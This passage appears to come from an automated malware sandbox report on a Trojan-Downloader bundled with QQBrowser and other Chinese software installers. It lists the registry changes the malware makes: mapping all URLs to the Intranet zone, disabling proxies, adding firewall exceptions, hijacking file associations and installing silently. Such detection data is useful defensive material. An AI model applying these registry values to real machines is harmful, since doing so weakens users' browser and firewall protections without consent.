"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\BackgroundDll]
"LoadingTime" = "LoadAsInited"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"ID" = "{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Tencent\QQBrowser\Record]
"LastStartupTime" = "1463642081"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Tencent\QQBrowser\Record]
"SendFailedCount"
"SendCount"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"DrvInstalled"

The process QQBrowser.exe:2492 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E EF 9E DA 9F 07 8F 01 1F 6D 5E 72 C2 58 1E AD"

The process QQBrowser.exe:3504 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F E3 F4 A3 4A 69 63 83 06 63 2E 0B 85 1B FC 77"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:3032 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 DA 13 D5 D2 97 09 B3 08 D2 5D 64 6F BE 6F CF"

The process QQPCDownload8889533.exe:1584 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 26 2E 36 38 82 D9 EE 74 23 49 B7 BE 9F EE A9"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp]
"QQPCDownload8889533.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\QQPCDownload8889533.exe:*:Enabled:Tencent Download Program"

The process j3lx7ew39.exe:2960 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCR\QQBrowser.Protocol]
"(Default)" = "QQBrowser HTML Document"

[HKCU\Software\Tencent\QQBrowser\Launch]
"SkinUpdateFlag" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"DumpType" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_NotifyNewApps" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"INSTLANG" = "1033"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Version" = "9.0.0.8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Desc" = "QBSafe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}]
"CommandOrder" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountEndTimeLow" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"DumpFolder" = "\\tencent.com\tfs\跨部门项目\pcbrowser_dumps\dumps\WerDumps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"DefaultBrowser" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"URLInfoAbout" = "http://www.qq.com"

[HKCR\QQBrowser.Protocol\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\12au8967c\QBInstaller.dll,"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download]
"j3lx7ew39.exe" = "1"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"JoinUserExperienceImprovePlan" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}]
"currentVersion" = "9.0.0.8"

[HKCR\QQBrowser.Protocol\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCR\QQBrowser.File\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"BSOD" = "0"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NewInstall" = "1"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"ManifestVersion" = "2"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\BackgroundDll]
"Path" = "QBSafe.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"DumpCount" = "10000"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"FirstLaunch" = "1"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\BackgroundDll]
"LoadingTime" = "LoadAsInited"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"DumpFolder" = "\\tencent.com\tfs\跨部门项目\pcbrowser_dumps\dumps\WerDumps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountEndTimeHigh" = "0"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"InstallDir" = "%Documents and Settings%\%current user%\Application Data\QB"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"DefaultBrowserFirstRun" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountStartTimeHigh" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E BF 9C C8 D8 17 91 63 75 DC A8 01 B2 9B D1 FE"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"EXE" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Tencent\QBSts]
"silent" = "YES"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"CustomDumpFlags" = "0"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"InstallProcedure" = "0"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"DirectWriteFontRenderEnabled" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\QQBrowser.File\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\QB\uninst.exe"

[HKLM\SOFTWARE\Tencent\QBSts]
"InstallDate" = "20160519"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"TriggerTimes" = "0"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"RequiredMinVersion" = "9.0.1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"Publisher" = "腾讯科技(深圳)有限公司"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"STYLE" = "80"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"Version" = "9.3.7078.400"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"BSODTimes" = "0"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Name" = "QBSafe"

[HKCU\Software\Tencent\QQBrowser]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB"

[HKCR\QQBrowser.File]
"(Default)" = "QQBrowser HTML Document"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountStartTimeLow" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"DumpType" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"QBPath" = "\DosDevices\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\user data"

[HKCU\Software\Tencent\QQBrowser\ModuleDll]
"CommandOrder" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"SupplyID" = "10009182"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Operational" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"CustomDumpFlags" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"DefaultBrowser" = "%Program Files%\Internet Explorer\iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"DisplayVersion" = "9.3.7078.400"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"ID" = "{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"SID" = "S-1-5-21-1844237615-1960408961-1801674531-1003"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"DisplayName" = "QQ浏览器"
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\QB\app.ico"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"DumpCount" = "10000"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"QB9Overwrite8" = "0"

[HKCU\Software\Tencent\QQBrowser\Launch]
"EducationUrl" = "http://browser.qq.com/new/9.3/welcome.html"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp]
"QQBrowserLiveup.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\QQBrowserLiveup.exe:*:Enabled:QQBrowserLiveup"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400]
"QQBrowser.exe" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qqbrowser.exe:*:Enabled:QQBrowser"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data\QB]
"bugreport.exe" = "%Documents and Settings%\%current user%\Application Data\QB\BugReport.exe:*:Enabled:QQBrowserBugReport"

"QQBrowser.exe" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe:*:Enabled:QQBrowser"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"GlobalFlag"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"VerifierFlags"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"PageHeapFlags"

The process WiFi-2175.exe:664 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 5C B7 A4 15 23 0D AD 04 52 01 BF 89 A6 71 87"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "WiFi-2175.exe"

[HKLM\SOFTWARE\WiFi共享大师]
"PCID" = "B732ED8460021910C75C40DF2A6DAAC2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process BrowserProtect18.exe:2432 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Classes\.gif]
"(Default)" = "QQBrowser.File"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\.swf]
"(Default)" = "QQBrowser.File"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 98 6C A0 11 6B C7 F6 BF D1 AF A0 C6 A7 BE E5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowserOTA.exe:2012 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 C8 57 57 06 F0 3F 24 D3 4D 68 BF 08 95 AA 1F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1]
"QQBrowserOTA.exe" = "1"

The process ExternalApp.exe:1112 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware\download\download]
"MiniTPFw.exe" = "MiniTPFw Application"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D4D786E8-0535-41DB-91F8-B18ABBCCDE6C}]
"AppPath" = ""

[HKLM\SOFTWARE\SogouSoftware]
"InstallTime" = "80 67 3D 57 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"DisplayIcon" = "%Program Files%\SogouSoftware\SogouSoftware.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKU\S-1-5-19\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

[HKU\.DEFAULT\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\S-1-5-19_CLASSES\SOFTWARE\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
